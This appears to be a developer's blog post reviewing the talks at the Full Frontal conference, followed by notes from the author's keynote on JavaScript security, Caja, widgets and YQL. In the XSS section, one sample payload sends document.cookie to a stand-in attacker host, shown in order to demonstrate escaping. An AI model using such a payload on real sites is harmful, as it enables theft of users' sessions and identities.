Last Friday I attended Full Frontal without speaking, which was a welcome change in my schedule. Originally I didn’t mean to go at all, but some people dropping out meant that I had to. Since I love Brighton and have truckloads of respect for Remy and Julie I went down there, and I can only say I would have kicked myself if I hadn’t.
Full Frontal was a pretty amazing conference with inspiring talks, good information and a quick flow that meant the day was over before I realised it.
Here are my impressions of the talks in succession:
Jeremy Ashkenas kicked off with “CoffeeScript Design Decisions” – an introduction to CoffeeScript and how it is not Ruby, although the syntax looks eerily similar. Mike Davies has a detailed write-up on this one, and I liked the way Jeremy showed the benefits of CoffeeScript without being pushy about it. I can see CoffeeScript being used, and with good debugging tools like source mapping this can be quite a boost for developers who want to build JavaScript without having to juggle its “special cases”.
Phil Hawksworth followed up with “Excessive Enhancement – Are we taking proper care of the Web?” – a call to arms to stop us from using new technology in an obstructing and excessive fashion. His whipping boy example was beetle.de, which is HTML5/CSS3 and all the other goodies but also clocks in at 11MB of data in hundreds of HTTP requests. In essence Phil repeated a lot of the things that I have been banging on about – that HTML5 is currently mostly used in brochureware sites that can put “skip intro” Flash solutions to shame in their lack of accessibility and responsiveness. Ubelly have a nice write-up of Phil’s talk and you can check the slides here. All in all I was very impressed with the talk. The presentation was very funny; at times it got a bit ranty, but that shows passion. I was strongly reminded of talks by Jake Archibald, and seeing that they worked together, that might not be a coincidence. Phil also mentioned a lot of tricks for fixing the issues he complained about, which is exactly the right way to deal with this.
Marijn Haverbeke of Eloquent JavaScript fame gave a good round-up of text editors in the browser with “Respectable code-editing in the browser”. The main focus was on CodeMirror, and Marijn brought the message across that in-browser editing is not an easy feat, but something that needs to be done.
Talking about development in the browser and the cloud: Rik Arends of Cloud 9 was next with “How we Architected Cloud9 IDE for scale on NodeJS” and basically blew me away showing off the new features that make Cloud9 a really interesting choice for collaborative editing in the browser.
After lunch, Nicholas Zakas did a re-run of his “Scalable JavaScript Application Architecture” talk, given some two years ago at another conference. That said, a lot of the talk still rings true, and Nicholas changed much of it to be agnostic of the environment and libraries in use. If you are looking for information to get you on the way to building huge JavaScript solutions, this is a good place to start.
Local linked data and open format overlord Glenn Jones was next with “Beyond the page” – a good talk on how new features in HTML5 like drag and drop, the File API and postMessage allow us to build incredibly rich and web-enabled applications. Glenn showed off all the things that also get me very excited these days about the web, including web intents. A great and inspiring talk with lots of code and ideas to play with now. You could see Glenn’s passion for the topic – especially when he showed how to allow users to drag and drop an image from the browser to the desktop using JavaScript (forgetting that this is possible in browsers without any intervention on our part). The difference, though, is that you can convert the image while you drag it and automatically rename or pack it, too.
A very charming speaker, Brendan Dawes was next with “Beyond The Planet Of The Geeks”, showing us just how much of a geek he is (he collects pencils and paper clips) and how his company and products moved from wild demos and experiments with on-screen interaction to useful and engaging products. To a degree, what was shown does not quite get there yet: the interface at the end was shiny and amazing and looked like Flash but used new technology. It failed to deliver the basic principles mentioned in Phil’s talk of bookmarkability and real links, though. I talked with Brendan afterwards and we’ll work on getting the History API and local storage in there to make it beautiful, engaging and a good web citizen.
My absolute highlight of the day was Marcin Wichary with “You gotta do what you gotta do” – a talk about Google doodles and the work that went into them. Marcin was amazing – baffling interactive slides, a very humble demeanour and great information on the tricks that had to be applied to make doodles perform and stay small. I was very much reminded of the things we had to do in the demo scene on the C64 and Amiga. A great insight into just how much work goes into a thing that is seen for 24 hours and then vanishes. That said, I pestered Marcin afterwards about whether they would be willing to show some of the cool stuff he explained in a blog post, and he said they would.
All in all it was an incredible day and well worth the money (had I paid for it). The only thing I am really sad about is that there was no recording or filming. Especially Marcin’s talk is something that needs to be archived for people to see.
Update: as Remy just pointed out on Twitter, audio recordings of the talks are available and will be published soon. They are also considering video recordings for next year.
Here are the slides, the audio recording and my notes for my keynote at the Full Frontal conference held yesterday in Brighton, England. It was a blast – thank you, Remy and Julie!
The following was the description of the talk introducing the ideas to the attendees of Full Frontal.
Frontloaded and zipped up – do loose types sink ships?
JavaScript had a bumpy ride up to now, from its origins as a CGI-replacement, initiator of countless popups and annoying effects over the renaissance as Ajax enabler up to becoming wrapped up in libraries to work around the hell that is browser differences. With the ubiquity of JavaScript comes a new challenge. How do we keep JavaScript safe when browsers don’t really distinguish between different sources and give them all the same rights? Why do we still judge the usefulness of JavaScript by how badly browsers speak it? Learn about some environments you can use JavaScript in securely and marvel at the magic and annoyances that are technologies that try to put a lock on the issue of JavaScript security.
A quick trip down memory lane.
When I first encountered JavaScript it was mainly used for simple calculators, window manipulation and form validation. The main interface was the browser object model, with window being the main object and forms and elements being the collections to manipulate. You added content either by changing the value of a form field or by using document.write(), with the latter behaving differently from browser to browser. The other thing you had was the images array, and this is what we used extensively to create rollovers.
Event handling was done with on{event} inline handlers and the body always had an onload handler on it.
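The rollover trick boiled down to swapping the src of an image on mouseover and back on mouseout. A minimal sketch of the idea (the “_on” naming convention and the markup in the comment are my assumptions, for illustration only):

```javascript
// Classic image rollover: compute the "hover" version of an image src.
// Convention assumed here: "btn.gif" has a hover state "btn_on.gif".
function rolloverSrc(src, over) {
  return over ? src.replace(/(\.[a-z]+)$/, '_on$1')
              : src.replace(/_on(\.[a-z]+)$/, '$1');
}

// Wired up with the inline handlers of the era:
// <img src="btn.gif" name="btn"
//      onmouseover="this.src = rolloverSrc(this.src, true)"
//      onmouseout="this.src = rolloverSrc(this.src, false)">
```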
Bring on the bling!
That however did not stop us from already abusing JavaScript to create pointless bells and whistles. Status bar tickers, title changing scripts and moving popup windows were the first to annoy the end user and they were just the start.
More bling.
With browsers starting to allow you to manipulate more of the document (via document.all and document.layers) and new and bespoke CSS extensions we had even more options to do very annoying and pointless things. Animated menus, rainbow cycling scrollbars, the floating (and flickering) Geocities logo, mousetrails and other abominations were built to bling up our sites and subsequently the audience got sick of JavaScript and discarded it as a toy.
Ajax for the win!
This all changed when Ajax came around, and there was no way around loading content on demand with XMLHttpRequest in some way or another – if you wanted to have a cool web site, that is. And of course people used it wrongly.
Security scares.
As people used JavaScript to load information that should not be visible to the world – and as it is easy to intercept and see everything that happens in a browser – more and more security scares came up.
Is JavaScript a security problem?
This raises the question of whether JavaScript is in itself a security problem and whether we should discard it altogether.
Security flaws start at the backend but JavaScript gets the blame.
Last week I came across an interesting survey by the security company Cenzic – get the PDF here. They looked at the state of the web and the main security problems in the first two quarters of 2009. The survey showed that the browser was responsible for only 8% of the overall security issues.
One interesting thing is that most security flaws start with a problem on the backend but get blamed on JavaScript. XSS is a backend problem, but it becomes a JavaScript problem because browsers give scripts too many rights.
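The fix therefore belongs on the backend: escape user-supplied content before it reaches the page. A minimal sketch (the helper name is mine, not from any particular framework):

```javascript
// Escape user input before writing it into HTML - the root fix for XSS
// lives on the backend, even though JavaScript gets the blame.
function escapeHTML(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// A typical cookie-stealing payload, rendered harmless as plain text:
var evil = '<script>new Image().src="http://evil.example/?"+document.cookie<\/script>';
var safe = escapeHTML(evil);
```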
JavaScript implementation vs. JavaScript
The problem is not JavaScript itself – well, not exclusively – it is mostly the implementation of it in browsers. And funnily enough this is how we measure the quality of the language. It is like judging the quality of a book by its movie.
Browsers don’t care where JavaScript comes from.
To a browser, every piece of JavaScript has the same rights to the content of the page and anything else JavaScript can reach – and that includes cookies. When I can steal your cookies I can steal your users’ identities, and that is a big security issue.
Browsers are full of security holes.
The other issue is that browsers are full of security faults. Interestingly, while people complain about IE6 and its flaws, the survey actually ranked Firefox and Safari as the most vulnerable browsers. The reasons are plugins in the case of Firefox and – in Safari’s case – the iPhone. Successful platforms are always interesting targets.
Plugins have been, and still are, a main source of security issues. Especially in IE, Flash and PDF display have always been a problem. The reason is simple: plugins extend the reach of the browser into the file system, and that is an interesting attack vector. So if you offer PDF documents and want to keep your system secure, it might be a good idea to loop them through a script that sets a header forcing a download – this also allows you to add statistics to the PDF downloads.
So we can’t use JavaScript, right?
This leads a lot of people not to trust JavaScript at all. Plugins like NoScript are all the rage, and the security-conscious are happy to call JavaScript the source of all evil.
It is about spreading the joy of JavaScript.
JavaScript is an amazingly useful part of the interfaces we give our end users. Totally turning it off or not using it means we give up on a lot of things that our users should get and expect from an interface in 2009. I like that I can write a message while an attachment uploads in the background.
Learning JavaScript
The first thing to remember is that this is not 1997. We don’t have to learn JavaScript by looking at other people’s source code. Opera’s web standards curriculum and The Yahoo video theatre are great resources to take your first steps into the JavaScript world.
What to use JavaScript for
The main thing is to remember what we should use JavaScript for:
warning users about flawed entries (password strength for example)
extending the interface options of HTML to become an application language (sliders, maps, comboboxes…)
any visual effect that cannot be done safely with CSS (animation, menus…)
CSS has come a long way but unless you can control the animation and be sure it works cross-browser it is not a replacement. Menu systems using CSS only are a gimmick as they cannot be made keyboard accessible.
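A sketch of the first item on that list – a rough password strength score (the scoring rules here are made up for illustration; real checks would be more nuanced):

```javascript
// Very rough password strength score: length plus character variety,
// used to warn the user while they type - never as a security measure.
function passwordStrength(pw) {
  var score = 0;
  if (pw.length >= 8) { score += 1; }
  if (/[0-9]/.test(pw)) { score += 1; }
  if (/[a-z]/.test(pw) && /[A-Z]/.test(pw)) { score += 1; }
  if (/[^a-zA-Z0-9]/.test(pw)) { score += 1; }
  return score; // 0 (weak) to 4 (strong)
}
```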
What not to use JavaScript for
Sensitive information (credit card numbers, any real user data)
Cookie handling containing session data
Trying to protect content (right-click scripts, email obfuscation)
Replacing your server / saving on server traffic without a fallback
What if you need more?
All this becomes an issue when you get into developing large web products where you push the envelope of what can be done with the web and the technologies right now. The new Yahoo homepage is one of these examples – in it we wanted to allow third-party developers to build their own applications and run them safely inside ours without endangering the privacy of our users.
You can limit yourself
One thing you can do is to limit yourself to the “safe” parts of a language. Douglas Crockford’s AdSafe takes this approach and is meant as a guideline for ad providers.
You can pre-process JavaScript
The other option is to enforce the limitation of the language by pre-processing JavaScript and converting it to a safer subset. The main tool for this nowadays is Caja, which was invented by Google and has now been made workable by Google and Yahoo for the OpenSocial platform. Caja converts JavaScript to a safe subset – either on the client or on the server.
Things Caja doesn’t allow you to do
To ensure the security of our applications, Caja stops you from using some things you might have gotten accustomed to using in the last few years.
Caja and HTML
Here are the things you cannot use in HTML:
name attributes
custom attributes
custom tags
unclosed tags
embed
iframe
link rel="..."
javascript:void(0)
radio buttons in IE
relative URLs
Caja and JavaScript
Things you need to keep out of your JavaScript:
eval()
new Function()
strings as event handlers (node.onclick = '...';)
names ending with double / triple underscores
the with statement (with (obj) { ... })
implicit global variables (always declare with var)
calling a method as a function
document.write
window.event
Ajax requests returning JavaScript
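Most of these restrictions map to habits that are good style anyway. A sketch of Caja-friendly replacements for a few of the banned patterns (names are mine, for illustration only):

```javascript
// Instead of an implicit global, always declare with var:
var counter = 0;

// Instead of eval() or new Function() to look up a dynamic property,
// use bracket notation:
var config = { width: 100, height: 50 };
function read(obj, name) {
  return obj[name]; // no eval('obj.' + name) needed
}

// Instead of a string as an event handler (node.onclick = '...'),
// assign a real function:
var handler = function () { counter += 1; };
```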
Caja and CSS
And last but not least things deemed dangerous in CSS are:
star hacks
underscore hacks
IE conditionals
Insert-after clear fix
expression()
@import
Caja ready code examples
You can find a good collection of Caja ready code examples in the Yahoo Application Platform documentation.
Caja problems and making it easier
Whilst Caja is a great idea to ensure the security of widgets, it is not without its problems. If you choose client-side conversion it means a massive dent in the performance of your application, and even with server-side conversion it becomes harder to build new systems. For starters, Caja-converted code is very hard to read and therefore to debug, and in many cases it means that as a developer you need to change your ways.
Libraries and Caja compliance
Much like we fix browsers, we can also use libraries to make our Caja-compliant development easier. The first library to be fully Caja compliant is the Yahoo User Interface library and other libraries like jQuery have also shown interest in compliance.
Abstracting the issue with an own language – YML
The other way to make it easier to write secure code is to abstract most of the changes to our normal development practices out into a markup language of its own. Facebook has done this, and in Yahoo’s case there is the Yahoo Markup Language, or YML for short. Using this language in a widget for the Yahoo homepage, you can do Ajax requests and dig into the Yahoo social graph without having to write any JavaScript or server-side code.
Extending browsers
Another way to make JavaScript development more interesting is to think about browser extensions. This starts with GreaseMonkey, which allows Firefox users to extend any web site out there with new functionality using a few lines of DOM scripting – a great way, for example, to do quick prototyping. Google Gears, Yahoo BrowserPlus and Mozilla Jetpack kick this idea up a notch and give you new APIs that extend the reach of the browser into local storage, allow for database access in JavaScript and give you worker threads to do heavy computations without slowing down the main interface. These extensions give browsers the power we would love to have to deliver real applications inside browsers.
Moving out of the browser
The other thing you can do with JavaScript these days is to move outside the browser and take your HTML, CSS and JavaScript solutions to other platforms.
Widget frameworks
Widget frameworks have been around for a while with Konfabulator and Apple Dashboard widgets leading the way. Opera also allows you to run small applications outside the confines of a browser window. The interesting thing about widgets is that they always looked much prettier than most web solutions – mainly because PNG support was a given and not something you had to hack for MSIE.
W3C widgets
W3C widgets are a standard that allows you to zip up an HTML document with CSS, JavaScript and images and run it as a self-contained widget. Peter-Paul Koch has written a great introduction to W3C widgets and several mobile phone providers (first and foremost Vodafone) offer a way to run these widgets on handsets without the need to learn any mobile OS language or tools.
Adobe Air
Adobe Air has made it possible for web developers to write full-blown installable applications that run across several operating systems and have access to databases and the file system. Probably the most successful apps are Twitter clients and music apps like Spotify.
Command line JavaScript – Rhino
If you don’t like all the fancy visual stuff and you want to use JavaScript to do some heavy data conversion, you can use JavaScript on the command line with Rhino, a JavaScript engine written in Java. The really cool thing about writing JavaScript for the command line is that it supports all the features of the language and you are not at the mercy of a browser to get it right.
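A sketch of that kind of command-line heavy lifting – converting CSV data into a list of objects. The conversion logic is plain JavaScript; the readFile() and print() calls in the comments are Rhino shell functions, and the file name is an assumption:

```javascript
// Convert CSV text (first line = column names) into an array of objects.
function csvToObjects(csv) {
  var lines = csv.split('\n');
  var keys = lines[0].split(',');
  var out = [];
  for (var i = 1; i < lines.length; i++) {
    if (!lines[i]) { continue; }
    var values = lines[i].split(',');
    var row = {};
    for (var j = 0; j < keys.length; j++) {
      row[keys[j]] = values[j];
    }
    out.push(row);
  }
  return out;
}

// In the Rhino shell this would be:
// print(uneval(csvToObjects(readFile('data.csv'))));
var data = csvToObjects('name,city\nRemy,Brighton\nJulie,Brighton');
```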
Turning JavaScript Mashups into web services.
One rather new opportunity for developers is YQL, the Yahoo Query Language, which lets you easily mash up and filter data from several data sources on the web. YQL allows you to:
mash up data with a SQL-style syntax
filter down to the absolutely necessary data
return as XML, JSON, JSON-P and JSON-P-X
use Yahoo as a high-speed proxy to retrieve data from various sources.
use Yahoo as a rate limiting and caching proxy when providing data.
Retrieving data from an HTML document and choosing the right output format
Using YQL it is dead easy, for example, to retrieve the headlines from an HTML document with the following statement:
select * from html where url="http://2009.fullfrontal.org" and xpath="//h3"
YQL is a web service in itself and you can retrieve the data returned from this request in different formats.
XML returns the data as an XML file which is not that useful in a JavaScript environment.
JSON is natively supported and therefore much easier to parse.
JSON-P wraps the returned JSON object in a JavaScript function call and thereby makes it very easy to use in a script node (either hardcoded or created on the fly).
JSON-P-X wraps the returned JSON object in a JavaScript function call and returns the XML content (in this case the scraped HTML) as a string. This makes it very easy to use innerHTML to render the data in a browser without having to loop through the JSON object and re-assemble the string.
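In the browser, using the JSON-P output comes down to pointing a generated script node at the YQL web service. A sketch of the pattern (the public endpoint and its q, format and callback parameters follow the YQL REST API; the callback name is my choice):

```javascript
// Callback that YQL will call with the returned data
function handleHeadlines(data) {
  var headlines = data.query.results.h3;
  // ... render the headlines into the page ...
}

// The statement goes into the q parameter, URL-encoded,
// and the callback name into the callback parameter.
var statement = 'select * from html where ' +
                'url="http://2009.fullfrontal.org" and xpath="//h3"';
var url = 'http://query.yahooapis.com/v1/public/yql?q=' +
          encodeURIComponent(statement) +
          '&format=json&callback=handleHeadlines';

// Create the script node on the fly (browser only):
if (typeof document !== 'undefined') {
  var s = document.createElement('script');
  s.src = url;
  document.getElementsByTagName('head')[0].appendChild(s);
}
```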
Retrieving photos for a certain geographical location
As a demo, try this out. In order to retrieve photos for a certain geographical location you can use the geo and Flickr APIs in a single YQL statement:
select farm,id,secret,owner.realname,server,title,urls.url.content
from flickr.photos.info where photo_id in (
  select id from flickr.photos.search where woe_id in (
    select woeid from geo.places where text="london"
  )
)
Moving JavaScript solutions into YQL to turn them into web services
The problem with the solution above is that you make yourself dependent on JavaScript to show these photos. If you still want to use JavaScript but allow users without it to see the photos, you can use a YQL open table with embedded JavaScript to do the conversion. YQL uses Rhino to execute your JavaScript server-side and returns the content you created inside an XML or JSON file. As the JavaScript is executed on the server, you have full E4X support to make working with XML painless, and you can use advanced JavaScript features like for each:
var amt = amount || 10;
var query = 'select farm,id,secret,owner.realname,server,title,' +
            'urls.url.content from flickr.photos.info where ' +
            'photo_id in (select id from flickr.photos.search(' +
            amt + ') where ';
if (location !== null) {
  query += 'woe_id in (select woeid from geo.places where text="' +
           location + '") and ';
}
query += ' text="' + text + '" and license=4)';
var x = y.query(query);
var out = <ul/>;
for each (var cur in x.results.photo) {
  var li = <li/>;
  var a = <a/>;
  a.@["href"] = cur.urls.url;
  var img = <img/>;
  var url = 'http://farm' + cur.@farm + '.static.flickr.com/' +
            cur.@server + '/' + cur.@id + '_' + cur.@secret +
            '_s.jpg';
  img.@["src"] = url;
  img.@["alt"] = cur.title;
  a.img = img;
  li.a = a;
  out.li += li;
}
response.object = out;
This, embedded in an open table, means you can now retrieve photos from Flickr as a UL with the following YQL statement:
select * from flickr.photolist where text="me" and location="uk" and amount=20
Or with a very simple JavaScript, thanks to the JSON-P-X output format:
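A sketch of what that JavaScript could look like: with JSON-P-X the results arrive as ready-made HTML strings, so rendering is a single innerHTML assignment (the callback name and element ID are my assumptions):

```javascript
// JSON-P-X callback: results is an array of HTML strings -
// here the UL built by the open table above.
function photolist(data) {
  var html = data.query.results.join('');
  if (typeof document !== 'undefined') {
    document.getElementById('photos').innerHTML = html;
  }
  return html;
}
```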
Another example – scraping HTML from web pages that need POST data
Another powerful example of what you can do with JavaScript when you embed it into a YQL table is the htmlpost open table. As explained in detail in this blog post (http://www.wait-till-i.com/2009/11/16/using-yql-to-read-html-from-a-document-that-requires-post-data/), the JavaScript in this table extends the HTML scraping option of YQL to allow for POST data to be sent to a document before retrieving the HTML:
select * from htmlpost where
  url='http://isithackday.com/hacks/htmlpost/index.php'
  and postdata="foo=foo&bar=bar" and xpath="//p"
Notice that YQL execute gives you full REST and HTTP support and has the XPath conversion built in as a function of its own.
OAuth in JavaScript – the Netflix example
Another interesting example is the open table provided by Netflix, which shows how you can use OAuth in JavaScript:
// Include the OAuth libraries from oauth.net
y.include("http://oauth.googlecode.com/svn/code/javascript/oauth.js");
y.include("http://oauth.googlecode.com/svn/code/javascript/sha1.js");
// Collect all the parameters
var encodedurl = request.url;
var accessor = { consumerSecret: cks, tokenSecret: "" };
var message = {
  action: encodedurl,
  method: "GET",
  parameters: [["oauth_consumer_key", ck], ["oauth_version", "1.0"]]
};
OAuth.setTimestampAndNonce(message);
// Sign the request
OAuth.SignatureMethod.sign(message, accessor);
try {
  // Get the content from the service along with the OAuth header,
  // and return the result back out
  response.object = request.contentType('application/xml')
    .header("Authorization",
      OAuth.getAuthorizationHeader("netflix.com", message.parameters))
    .get().response;
} catch (err) {
  response.object = { 'result': 'failure', 'error': err };
}
Liberating our JavaScript
As you can see, switching environments liberates our JavaScript solutions and gives us much tighter security. So open your minds and don’t judge JavaScript by its implementation. Instead, have fun with it and use it wisely. With great power comes great responsibility.